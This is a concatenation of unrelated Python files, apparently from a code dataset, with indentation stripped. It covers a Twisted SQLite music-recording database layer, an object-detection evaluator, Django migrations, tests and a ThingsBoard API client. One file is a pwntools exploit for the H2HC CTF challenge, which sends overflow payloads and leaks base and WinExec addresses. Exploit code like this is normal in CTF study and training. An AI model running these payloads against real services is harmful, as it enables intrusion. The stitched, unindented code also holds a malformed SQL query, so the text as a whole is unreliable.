if row[0] == expected_version:
log.info(f"Server database version {expected_version}")
return dbpool
else:
reactor = context["reactor"]
reactor.stop()
raise Exception(f"Database version ({row[0]}) did not match expected version ({expected_version}). Terminating.")
def run_check_version(dbpool):
return dbpool.runInteraction(check_version)
d = self.get_dbpool()
d.addCallback(run_check_version)
def on_error(error):
log.error("Failed to verify the database: "+str(error))
reactor = context["reactor"]
reactor.stop()
d.addErrback(on_error)
# Initialise the database structure from instructions in file
def _initialise_database(self, cursor):
log.info("Initialising database")
initialisation_commands_filename = \
pkg_resources.resource_filename(
"singtserver",
"database.sql"
)
f = open(initialisation_commands_filename, "r")
initialisation_commands = f.read()
return cursor.executescript(initialisation_commands)
def get_dbpool(self):
d = defer.Deferred()
def db_ready(db):
d.callback(db)
return db
self._db_ready.addCallback(db_ready)
return d
def get_combination(self, track_id=None, take_ids=[]):
# Sanity check arguments
if (track_id is None
and len(take_ids) == 0):
raise Exception(
"Getting a combination from the database requires "+
"at least a Track ID or at least one Take ID"
)
# Get combination from database.
# See answers to https://stackoverflow.com/questions/63356820/sql-select-from-many-to-one
# and https://stackoverflow.com/a/5766293/562930
def get_combo(cursor):
if track_id is None:
assert len(take_ids) > 0
sql = (
"SELECT id\n"+
"FROM Combinations\n"+
"WHERE backingTrackId IS NULL\n"+
" AND id IN\n"+
" (SELECT combinationId\n"+
" FROM CombinationsDetail\n"+
" GROUP BY combinationId\n" +
" HAVING SUM(CASE WHEN takeId IN ({seq}) THEN 1 ELSE 0) = ?".format(
seq=",".join(["?"]*len(take_ids))
)
)
cursor.execute(
sql,
(*take_ids, len(take_ids))
)
elif len(take_ids) == 0:
sql = (
"SELECT id\n"+
"FROM Combinations\n"+
"WHERE backingTrackId = ?\n"+
" AND NOT EXISTS\n"+
" (SELECT * \n"+
" FROM CombinationsDetail\n"+
" WHERE combinationId = Combinations.id)"
)
cursor.execute(
sql,
(track_id, )
)
else:
sql = ("SELECT id\n"+
"FROM Combinations\n"+
"WHERE backingTrackId = ?\n"+
" AND id IN\n"+
" (SELECT combinationId\n"+
" FROM CombinationsDetail\n"+
" GROUP BY combinationId\n" +
" HAVING SUM(CASE WHEN takeId IN ({seq}) THEN 1 ELSE 0 END) = ?)").format(
seq=",".join(['?']*len(take_ids))
)
cursor.execute(
sql,
(track_id, *take_ids, len(take_ids))
)
# Although there should be at most only one combo id that
# matches the track and takes specification, even if there
# are more than one, we'll just return the first (or None
# if there aren't any).
row = cursor.fetchone()
if row is None:
return None
combo_id = row[0]
return combo_id
def when_ready(dbpool):
return dbpool.runInteraction(get_combo)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_success(data):
log.info("Successfully added combination to database; combination id: "+str(data))
return data
d.addCallback(on_success)
def on_error(error):
log.error("Failed to add combination to the database: "+str(error))
raise Exception("Failed to add combination to the database")
d.addErrback(on_error)
return d
def add_combination(self, track_id=None, take_ids=[]):
"""Adds combination into database.
Returns combo_id.
"""
log.info(f"Adding combination to database with track id = {track_id} and take_ids = {take_ids}")
# Sanity check arguments
if (track_id is None
and len(take_ids) == 0):
raise Exception(
"Adding a combination to the database requires "+
"at least a Track ID or at least one Take ID"
)
# Create combination in database
def add_combo(cursor):
# Create audio id
cursor.execute("INSERT INTO AudioIdentifiers DEFAULT VALUES")
audio_id = cursor.lastrowid
print("track_id:", track_id)
cursor.execute(
"INSERT INTO Combinations (audioId, backingTrackId) VALUES (?, ?)",
(audio_id, track_id)
)
combo_id = cursor.lastrowid
for take_id in take_ids:
cursor.execute(
"INSERT INTO CombinationsDetail (combinationId, takeId) "+
"VALUES (?,?)",
(combo_id, take_id)
)
return combo_id
def when_ready(dbpool):
return dbpool.runInteraction(add_combo)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_success(data):
log.info("Successfully added combination to database; combination id: "+str(data))
return data
def on_error(error):
log.error("Failed to add combination to the database: "+str(error))
raise Exception("Failed to add combination to the database")
d.addCallback(on_success)
d.addErrback(on_error)
return d
def get_track_audio_id(self, track_id):
"""Returns track's audio id or None."""
def execute_sql(cursor):
cursor.execute("SELECT audioId FROM BackingTracks WHERE id = ?",
(track_id,))
results = cursor.fetchone()
if results is None:
return None
else:
return results[0]
def when_ready(dbpool):
return dbpool.runInteraction(execute_sql)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_error(error):
log.warn("Failed to get audio ID for track id ({track_id}): "+
str(error)
)
return error
d.addErrback(on_error)
return d
def get_take_audio_id(self, take_id):
"""Returns take's audio id or None."""
def execute_sql(cursor):
cursor.execute("SELECT audioId FROM Takes WHERE id = ?",
(take_id,))
results = cursor.fetchone()
if results is None:
return None
else:
return results[0]
def when_ready(dbpool):
return dbpool.runInteraction(execute_sql)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_error(error):
log.warn("Failed to get audio ID for take id ({take_id}): "+
str(error)
)
return error
d.addErrback(on_error)
return d
def assign_participant(self, client_id, name):
"""Assigns the name to the client id."""
def execute_sql(cursor):
# First, check if the id already exists
cursor.execute(
"SELECT participantName FROM Participants WHERE id = ?",
(client_id,)
)
row = cursor.fetchone()
if row is None:
# We don't currently have this ID, insert it
cursor.execute(
"INSERT INTO Participants (id, participantName) "+
"VALUES (?, ?)",
(client_id, name)
)
return client_id
# Otherwise, a row does already exist
current_name = row[0]
if name == current_name:
# We have nothing to do, the database is already
# correct
return client_id
# Otherwise, we need to update the database
cursor.execute(
"UPDATE Participants SET participantName = ? WHERE id = ?",
(name, client_id)
)
return client_id
def when_ready(dbpool):
return dbpool.runInteraction(execute_sql)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_error(error):
log.warn(
"Failed to add participant given name '{name}' and id '{client_id}': "+
str(error)
)
return error
d.addErrback(on_error)
return d
def get_participants(self):
def execute_sql(cursor):
cursor.execute("SELECT id, participantName FROM Participants")
rows = cursor.fetchall()
results = [{"id":id_, "name":name} for id_, name in rows]
return results
def when_ready(dbpool):
return dbpool.runInteraction(execute_sql)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_error(error):
log.warn(
"Failed to get participant list: "+
str(error)
)
return error
d.addErrback(on_error)
return d
def get_audio_ids_from_combination_id(self, combination_id):
def execute_sql(cursor):
# Get Track ID. There should be either zero or one, but
# not more.
cursor.execute(
"SELECT BackingTracks.audioId\n"+
"FROM Combinations\n"+
"LEFT JOIN BackingTracks\n"+
"ON Combinations.backingTrackId = BackingTracks.id\n"+
"WHERE combinations.id = ?",
(combination_id,)
)
rows = cursor.fetchall()
if len(rows) == 0:
# We don't have a backing track; that's fine, move on
# to the takes.
backing_audio_ids = []
elif len(rows) == 1:
# We have one backing track
row = rows[0]
audio_id = row[0]
backing_audio_ids = [audio_id]
else:
# We have more than one backing track; error.
raise Exception(
f"More than one backing track matched "+
f"combination id {combination_id}; this "+
f"shouldn't be possible"
)
# Get the Take IDs. There may be many of these. But if
# there wasn't a backing track id, then there needs to be
# at least one Take ID.
cursor.execute(
"SELECT audioId\n"+
"FROM CombinationsDetail\n"+
"LEFT JOIN Takes\n"+
"ON CombinationsDetail.id = Takes.combinationId\n"+
"WHERE CombinationsDetail.combinationId = ?",
(combination_id,)
)
rows = cursor.fetchall()
if len(rows) == 0:
# This is only as issue if we don't have any backing
# tracks either
if len(backing_audio_ids) == 0:
raise Exception(
f"We have neither a backing track nor takes "+
f"for the given combination id ({combination_id});"+
f"this shouldn't be possible"
)
else:
# Add the Take IDs to the list
takes_audio_ids = [row[0] for row in rows]
backing_audio_ids += takes_audio_ids
return backing_audio_ids
def when_ready(dbpool):
return dbpool.runInteraction(execute_sql)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_error(error):
log.warn(
"Failed to get backing audio ids from combination id: "+
str(error)
)
return error
d.addErrback(on_error)
return d
def add_take(self, take_name, combination_id):
def execute_sql(cursor):
# Create audio id
cursor.execute("INSERT INTO AudioIdentifiers DEFAULT VALUES")
audio_id = cursor.lastrowid
# Create take
cursor.execute(
"INSERT INTO Takes (audioId, combinationId, takeName, complete) "+
"VALUES (?, ?, ?, 0)",
(audio_id, combination_id, take_name)
)
take_id = cursor.lastrowid
return take_id
def when_ready(dbpool):
return dbpool.runInteraction(execute_sql)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_error(error):
log.warn(
"Failed to add take: "+
str(error)
)
return error
d.addErrback(on_error)
return d
def add_recording_audio_ids(self, take_id, participants):
def execute_sql(cursor):
audio_ids = {}
for participant_id in participants:
# Create audio id
cursor.execute("INSERT INTO AudioIdentifiers DEFAULT VALUES")
audio_id = cursor.lastrowid
# Add entry into Recordings
cursor.execute(
"INSERT INTO Recordings "+
"(audioId, participantId, takeId, complete) "+
"VALUES (?, ?, ?, 0)",
(audio_id, participant_id, take_id)
)
audio_ids[participant_id] = audio_id
return audio_ids
def when_ready(dbpool):
return dbpool.runInteraction(execute_sql)
d = self.get_dbpool()
d.addCallback(when_ready)
def on_error(error):
log.warn(
"Failed to add recordings for participants: "+
str(error)
)
return error
d.addErrback(on_error)
return d
|
8,124 | 3bb6305ceb1491db57c7f8b03e438398644c8f90 | from Eutils.pathmagic import context
with context():
import argparse
import numpy as np
from model.hourglass_yolo_net_multi_gpu import HOURGLASSYOLONet
from evaluator.Eutils.pascal_val import PASCAL_VAL
# from evaluator.Eutils.coco_val import COCO_VAL
from evaluator.Eutils.detector import Detector
import utils.config as cfg
from utils.logger import Logger
from utils.config_utils import get_config,ds_config
from tqdm import tqdm
import tensorflow as tf
import copy
import os
# import cv2
# from evaluator.Eutils.draw_result import draw_result
class EVALUATOR(object):
def __init__(self, detector, data):
self.detector = detector
self.data = data
self.gt = self.data.gt
self.image_ids, self.bboxes, \
self.prob, self.annotations = self.prepare()
self.precision, self.recall = self.pr_curve()
def prepare(self):
image_ids, bboxes, prob = [], [], []
annotations = {}
# while img_batch:
for i in tqdm(range(self.data.num_batch), desc='batch forward'):
# print("{:5}th batch".format(i))
img_batch, bbox_batch = self.data.get_batch()
results = self.detector.detect_batch(img_batch)
for ii in range(len(results)):
boxes_filtered, probs_filtered = results[ii]
# bbox_gt = bbox_batch[ii]['bbox_det']['bboxes']
# filter_mat_probs = np.array(probs_filtered >= cfg.THRESHOLD, dtype='bool')
# filter_mat_probs = np.nonzero(filter_mat_probs)
# boxes_ft_prob = boxes_filtered[filter_mat_probs]
# probs_ft_prob = probs_filtered[filter_mat_probs]
# image = img_batch[ii]
# draw_result(image, bbox_gt, (0, 0, 255))
# draw_result(image, boxes_ft_prob, (255, 0, 0))
# cv2.imshow('Image', image)
# cv2.waitKey(0)
image_ids.extend([bbox_batch[ii]['id']] * len(boxes_filtered))
bboxes.extend(boxes_filtered)
prob.extend(probs_filtered)
if bbox_batch[ii]['id'] not in annotations:
annotations[bbox_batch[ii]['id']] = copy.deepcopy(bbox_batch[ii]['bbox_det'])
sorted_ind = np.argsort(prob)[::-1]
sorted_prob = np.sort(prob)[::-1]
BB = np.array(bboxes)
BB = BB[sorted_ind, :]
image_ids = [image_ids[x] for x in sorted_ind]
return image_ids, BB, sorted_prob, annotations
def pr_curve(self):
nd = len(self.image_ids)
tp = np.zeros(nd)
fp = np.zeros(nd)
for d in tqdm(range(nd), desc='painting PR curve'):
# for d in range(nd):
R = self.annotations[self.image_ids[d]]
bb = self.bboxes[d, :].astype(float)
ovmax = -np.inf
BBGT = R['bboxes'].astype(float)
if BBGT.size > 0:
# compute overlaps
# intersection
ixmin = np.maximum(BBGT[:, 0] - BBGT[:, 2] / 2, bb[0] - bb[2] / 2)
iymin = np.maximum(BBGT[:, 1] - BBGT[:, 3] / 2, bb[1] - bb[3] / 2)
ixmax = np.minimum(BBGT[:, 0] + BBGT[:, 2] / 2, bb[0] + bb[2] / 2)
iymax = np.minimum(BBGT[:, 1] + BBGT[:, 3] / 2, bb[1] + bb[3] / 2)
iw = np.maximum(ixmax - ixmin + 1., 0.)
ih = np.maximum(iymax - iymin + 1., 0.)
inters = iw * ih
# union
uni = bb[2] * bb[3] + BBGT[:, 2] * BBGT[:, 3] - inters
overlaps = inters / uni
ovmax = np.max(overlaps)
jmax = np.argmax(overlaps)
if ovmax > cfg.IOU_THRESHOLD_GT:
if not R['det'][jmax]:
tp[d] = 1.
R['det'][jmax] = 1
else:
fp[d] = 1.
else:
fp[d] = 1.
# compute precision recall
fp = np.cumsum(fp)
tp = np.cumsum(tp)
rec = tp / float(self.gt)
# avoid divide by zero in case the first detection matches a difficult
# ground truth
prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
return prec, rec
def eval(self, use_07_metric=False):
""" ap = eval(rec, prec, [use_07_metric])
Compute AP given precision and recall.
If use_07_metric is true, uses the
VOC 07 11 point method (default:False).
"""
if use_07_metric:
# 11 point metric
ap = 0.
for t in np.arange(0., 1.1, 0.1):
if np.sum(self.recall >= t) == 0:
p = 0
else:
p = np.max(self.precision[self.recall >= t])
ap = ap + p / 11.
else:
# correct AP calculation
# first append sentinel values at the end
mrec = np.concatenate(([0.], self.recall, [1.]))
mpre = np.concatenate(([0.], self.precision, [0.]))
# compute the precision envelope
for i in range(mpre.size - 1, 0, -1):
mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
# to calculate area under PR curve, look for points
# where X axis (recall) changes value
i = np.where(mrec[1:] != mrec[:-1])[0]
# and sum (\Delta recall) * prec
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
return ap
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-ims', '--image_size', default=512, type=int)
parser.add_argument('-g','--gpu', type=str)
parser.add_argument('-c', '--cpu', action='store_true', help='use cpu')
parser.add_argument('-ds', '--data_source', default='all', type=str, choices=['coco', 'pascal', 'all'])
parser.add_argument('-ef', '--eval_file', type=str, required=True)
parser.add_argument('-lf', '--log_file', type=str)
parser.add_argument('-al', '--auto_all', action='store_true')
# when calculate single model
parser.add_argument('--weights', default="hg_yolo-240000", type=str)
parser.add_argument('--weight_dir', default='../log_bbox_hm/0.8_0.08_0.03_conv_fc_l2_0.005_bhm5', type=str)
args = parser.parse_args()
if args.gpu:
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
if args.cpu:
os.environ['CUDA_VISIBLE_DEVICES'] = ''
if not args.auto_all:
strings = get_config(args.weight_dir)
net = HOURGLASSYOLONet('eval')
detector = Detector(net, os.path.join(args.weight_dir, args.weights))
# data = COCO_VAL()
data = PASCAL_VAL()
evaluator = EVALUATOR(detector, data)
ap = evaluator.eval()
log = Logger(args.eval_file, level='debug')
log.logger.info('\n calculate single ap from {} {}\n'.format(args.weight_dir, args.weights))
log.logger.info('Data sc:{} AP:{} Weights:{} {}'.format(
data.__class__.__name__, ap, args.weights, strings))
else:
data_source = ds_config(args)
log = Logger(args.eval_file, level='debug')
log.logger.info('\n calculate ap from {}\n'.format(args.eval_file))
model_start = 'hg_yolo'
rootdir = '../' + args.log_file
root_list = os.listdir(rootdir) # 列出文件夹下所有的目录与文件
root_list.sort()
for path in root_list:
model_dir = os.path.join(rootdir, path)
models = os.listdir(model_dir)
models = filter(lambda x: x.startswith(model_start), models)
models = list(set(map(lambda x: x.split('.')[0], models)))
models.sort(key=lambda x: int(x[8:]))
for data in data_source:
for model in models:
strings = get_config(model_dir)
tf.reset_default_graph()
net = HOURGLASSYOLONet('eval')
detector = Detector(net, os.path.join(model_dir, model))
evaluator = EVALUATOR(detector, data)
ap = evaluator.eval()
log.logger.info('Data sc:{} AP:{:<5.5f} Weights:{} {}'.format(
data.__class__.__name__, ap, model, strings))
detector.sess.close()
del net
del detector
del evaluator
if __name__ == '__main__':
main()
# print(os.path.realpath('.'))
# print(os.path.dirname(os.path.realpath('.')))
# print(os.sep)
#
# print(os.path.dirname(os.path.realpath('.')).split(os.sep))
|
8,125 | f6c5c2180a1a4b05b3f103c330b455e7387713a6 | #!/usr/bin/env python
import numpy as np
import cv2
# Creat a Image with Pixel 512x512 RGB
image = np.zeros((512, 512, 3), np.uint8)
# Pt Definition
# x0y0, x1y0, x2 y0
# x0y1 , x1y1, x2y1
# Draw a Line in the Middle of the image
# Start Co-ordinate end Co-ordinate While Color and Line Width
cv2.line(image, (0, 0), (512, 0), (255, 255, 255), 5)
cv2.line(image, (0, 50), (512, 50), (255, 255, 255), 5)
# Draw Rectange
cv2.rectangle(image, (256, 0), (400, 256), (0, 255, 0), 3)
font = cv2.FONT_HERSHEY_COMPLEX
cv2.putText(image, "ROS OpenCV", (10, 500),
font, 2, (255, 0, 0), 2, cv2.LINE_AA)
cv2.imshow("Draw Image", image)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
8,126 | 49722f640eec02029865fd702e13e485eda6391b | import math_series.series as func
""" Testing for fibonacci function """
def test_fibonacci_zero():
actual = func.fibonacci(0)
expected = 0
assert actual == expected
def test_fibonacci_one():
actual = func.fibonacci(1)
expected = 1
assert actual == expected
def test_fibonacci_negative():
actual = func.fibonacci(-5)
expected = "Negative values are not allowable"
assert actual == expected
def test_fibonacci_else():
actual = func.fibonacci(6)
expected = 8
assert actual == expected
""" Testing for lucas function """
def test_lucas_zero():
actual = func.lucas(0)
expected = 2
assert actual == expected
def test_lucas_one():
actual = func.lucas(1)
expected = 1
assert actual == expected
def test_lucas_negative():
actual = func.lucas(-5)
expected = "Negative values are not allowable"
assert actual == expected
def test_lucas_else():
actual = func.lucas(6)
expected = 18
assert actual == expected
""" Testing for non_fibonacci_lucas function """
def test_non_fibonacci_lucas_zero():
actual = func.non_fibonacci_lucas(0,2,4)
expected = 2
assert actual == expected
def test_non_fibonacci_lucas_one():
actual = func.non_fibonacci_lucas(1,2,4)
expected = 4
assert actual == expected
def test_non_fibonacci_lucas_negative():
actual = func.non_fibonacci_lucas(-5,2,4)
expected = "Negative values are not allowable"
assert actual == expected
def test_non_fibonacci_lucas_else():
actual = func.non_fibonacci_lucas(3,2,4)
expected = 10
assert actual == expected |
8,127 | d13589979ba7b6facd8339111323270c9920a9bf | # Generated by Django 2.0.4 on 2018-04-30 14:01
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('base', '0007_topfilter'),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('base_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='base.Base')),
('title', models.CharField(max_length=50)),
('text', models.TextField()),
('post_related_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='post_related_user_name', to=settings.AUTH_USER_MODEL)),
],
bases=('base.base',),
),
]
|
8,128 | 4fff64a62776a9d1b06cc11d5e55fc00f6787338 | #!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Aplicação H2HC criado para CTF
Exploit criado por M4v3r1ck (helvio_junior[at]hotmail[dot]com)
'''
from pwn import *
import os
context(arch='amd64', os='windows', log_level='debug')
host= "192.168.255.201"
port = 54345
# Estágio 1
log.info("Enviando estágio 1")
payload1 = "H2HC" #cookie
payload1 += "\xff\x00\x00\x00" #size to trigger the vul
payload1 += "\x41" * 0xff
payload1 += "\n"
p = remote(host, port)
p.send(payload1)
p.recv(4096)
p.close()
# Estágio 2
log.info("Enviando estágio 2")
payload2 = "H2HC"
payload2 += "\xff\x00\x00\x00"
payload2 += "A" * 0x100
payload2 += "\x04\x09\x00\x00"
p1 = remote(host, port)
p1.send(payload2)
p1.recvuntil("H2HC19 message:")
#Leak de um endereço no próprio fluxo de execução da aplicação (Sessão .text)
p1.recv(0x10d)
ld1 = p1.recv(8)
leak_local_addr = u64(ld1.ljust(8, "\x00"))
base_addr = leak_local_addr & 0xffffffffffff0000
log.info("Local leak : %s" % hex(leak_local_addr))
log.info("App Base Addr : %s" % hex(base_addr))
# Leak do endereço da função WinExec
p1.recv(0x7f0) #offset entre a posição zero até o 90 f0 7e 0a fa 7f
lead_data = p1.recv(8)
p1.recv(4096)
leak = u64(lead_data.ljust(8, "\x00"))
log.info("WinExec addr leak : %s" % hex(leak))
|
8,129 | 0c7f2412fe9a83d70d41fbc4bbaf135e6bc4149a | # Generated by Django 2.2.6 on 2019-11-05 02:28
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('drchrono', '0011_patient_cell_phone'),
]
operations = [
migrations.AddField(
model_name='appointment',
name='date',
field=models.DateTimeField(default=None, null=True),
),
]
|
8,130 | 321147f2e2d8caf6d9224e2a8969f51ded48baf7 | # Generated by Django 3.1.5 on 2021-02-24 18:34
from django.db import migrations, models
import stdimage.models
class Migration(migrations.Migration):
dependencies = [
('Site', '0004_arquivopdf'),
]
operations = [
migrations.CreateModel(
name='historico',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('criados', models.DateField(auto_now_add=True, verbose_name='Criação')),
('modificado', models.DateField(auto_now=True, verbose_name='Atualização')),
('ativo', models.BooleanField(default=True, verbose_name='Ativo?')),
('titulo', models.CharField(max_length=100, verbose_name='Título')),
('imagem', stdimage.models.StdImageField(upload_to='img_historico', verbose_name='Imagem')),
('subtitulo01', models.CharField(max_length=100, verbose_name='Subtítulo01')),
('descricao01', models.TextField(max_length=200, verbose_name='Subtítulo01 Descrição')),
('subtitulo02', models.CharField(max_length=100, verbose_name='Subtítulo02')),
('descricao02', models.TextField(max_length=200, verbose_name='Subtítulo02 Descrição')),
('contador01', models.CharField(max_length=50, verbose_name='contador01')),
('valor01', models.TextField(max_length=6, verbose_name='valor contador01')),
('contador02', models.CharField(max_length=50, verbose_name='contador02')),
('valor02', models.TextField(max_length=6, verbose_name='valor contador02')),
('contador03', models.CharField(max_length=50, verbose_name='contador03')),
('valor03', models.TextField(max_length=6, verbose_name='valor contador03')),
('subtitulo03', models.CharField(max_length=100, verbose_name='Subtítulo03')),
('descricao03', models.TextField(max_length=200, verbose_name='Subtítulo03 Descrição')),
],
options={
'verbose_name': 'Notícia',
'verbose_name_plural': 'Noticias',
},
),
migrations.AddField(
model_name='arquivopdf',
name='descricao',
field=models.TextField(default=1, max_length=200, verbose_name='Descrição'),
preserve_default=False,
),
migrations.AddField(
model_name='arquivopdf',
name='titulo',
field=models.CharField(default=1, max_length=100, verbose_name='Título'),
preserve_default=False,
),
]
|
8,131 | e37f958191c9481c6664e90c17f43419a0b5b606 | from __future__ import annotations
from typing import TYPE_CHECKING
import abc
import tcod.event
if TYPE_CHECKING:
from tcodplus.canvas import Canvas
from tcodplus.event import CanvasDispatcher
class IDrawable(abc.ABC):
@property
@abc.abstractmethod
def force_redraw(self) -> bool:
pass
@property
@force_redraw.setter
def force_redraw(self, value: bool) -> None:
pass
@abc.abstractmethod
def draw(self, dest: Canvas) -> None:
pass
@abc.abstractmethod
def base_drawing(self, console: tcod.console.Console) -> None:
pass
class IFocusable(abc.ABC):
@property
@abc.abstractmethod
def focus_dispatcher(self) -> CanvasDispatcher:
pass
class IMouseFocusable(IFocusable):
@abc.abstractmethod
def mousefocus(self, event: tcod.event.MouseMotion) -> bool:
pass
class IKeyboardFocusable(IFocusable):
@property
@abc.abstractmethod
def kbdfocus(self) -> bool:
pass
@kbdfocus.setter
@abc.abstractmethod
def kbdfocus(self, val: bool) -> None:
pass
@property
@abc.abstractmethod
def kbdfocus_requested(self) -> bool:
pass
@kbdfocus_requested.setter
@abc.abstractmethod
def kbdfocus_requested(self, val: bool) -> None:
pass
class IUpdatable(abc.ABC):
@property
@abc.abstractmethod
def should_update(self) -> bool:
pass
@should_update.setter
@abc.abstractmethod
def should_update(self, value: bool) -> None:
pass
@abc.abstractmethod
def update(self) -> None:
pass
|
8,132 | 9b30075183cf9611307afa74aa45979872e7e9d5 | # coding: utf-8
# Copyright 2020. ThingsBoard
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api.api_ce import DeviceControllerApi
class DeviceControllerApi(DeviceControllerApi):
"""NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
super(DeviceControllerApi, self).__init__(api_client)
def claim_device_using_post(self, device_name, **kwargs): # noqa: E501
"""claimDevice # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.claim_device_using_post(device_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str device_name: deviceName (required)
:param ClaimRequest claim_request: claimRequest
:param str sub_customer_id: subCustomerId
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.claim_device_using_post_with_http_info(device_name, **kwargs) # noqa: E501
else:
(data) = self.claim_device_using_post_with_http_info(device_name, **kwargs) # noqa: E501
return data
def claim_device_using_post_with_http_info(self, device_name, **kwargs): # noqa: E501
"""claimDevice # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.claim_device_using_post_with_http_info(device_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str device_name: deviceName (required)
:param ClaimRequest claim_request: claimRequest
:param str sub_customer_id: subCustomerId
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['device_name', 'claim_request', 'sub_customer_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'device_name' is set
if ('device_name' not in params or
params['device_name'] is None):
raise ValueError("Missing the required parameter `device_name` when calling `claim_device_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'device_name' in params:
path_params['deviceName'] = params['device_name'] # noqa: E501
query_params = []
if 'sub_customer_id' in params:
query_params.append(('subCustomerId', params['sub_customer_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'claim_request' in params:
body_params = params['claim_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/customer/device/{deviceName}/claim{?subCustomerId}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_customer_devices_using_get(self, customer_id, page_size, page, **kwargs): # noqa: E501
"""getCustomerDevices # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_customer_devices_using_get(customer_id, page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str customer_id: customerId (required)
:param str page_size: pageSize (required)
:param str page: page (required)
:param str type: type
:param str text_search: textSearch
:param str sort_property: sortProperty
:param str sort_order: sortOrder
:return: PageDataDevice
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_customer_devices_using_get_with_http_info(customer_id, page_size, page, **kwargs) # noqa: E501
else:
(data) = self.get_customer_devices_using_get_with_http_info(customer_id, page_size, page, **kwargs) # noqa: E501
return data
def get_customer_devices_using_get_with_http_info(self, customer_id, page_size, page, **kwargs): # noqa: E501
"""getCustomerDevices # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_customer_devices_using_get_with_http_info(customer_id, page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str customer_id: customerId (required)
:param str page_size: pageSize (required)
:param str page: page (required)
:param str type: type
:param str text_search: textSearch
:param str sort_property: sortProperty
:param str sort_order: sortOrder
:return: PageDataDevice
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['customer_id', 'page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'customer_id' is set
if ('customer_id' not in params or
params['customer_id'] is None):
raise ValueError("Missing the required parameter `customer_id` when calling `get_customer_devices_using_get`") # noqa: E501
# verify the required parameter 'page_size' is set
if ('page_size' not in params or
params['page_size'] is None):
raise ValueError("Missing the required parameter `page_size` when calling `get_customer_devices_using_get`") # noqa: E501
# verify the required parameter 'page' is set
if ('page' not in params or
params['page'] is None):
raise ValueError("Missing the required parameter `page` when calling `get_customer_devices_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'customer_id' in params:
path_params['customerId'] = params['customer_id'] # noqa: E501
query_params = []
if 'type' in params:
query_params.append(('type', params['type'])) # noqa: E501
if 'text_search' in params:
query_params.append(('textSearch', params['text_search'])) # noqa: E501
if 'sort_property' in params:
query_params.append(('sortProperty', params['sort_property'])) # noqa: E501
if 'sort_order' in params:
query_params.append(('sortOrder', params['sort_order'])) # noqa: E501
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'page' in params:
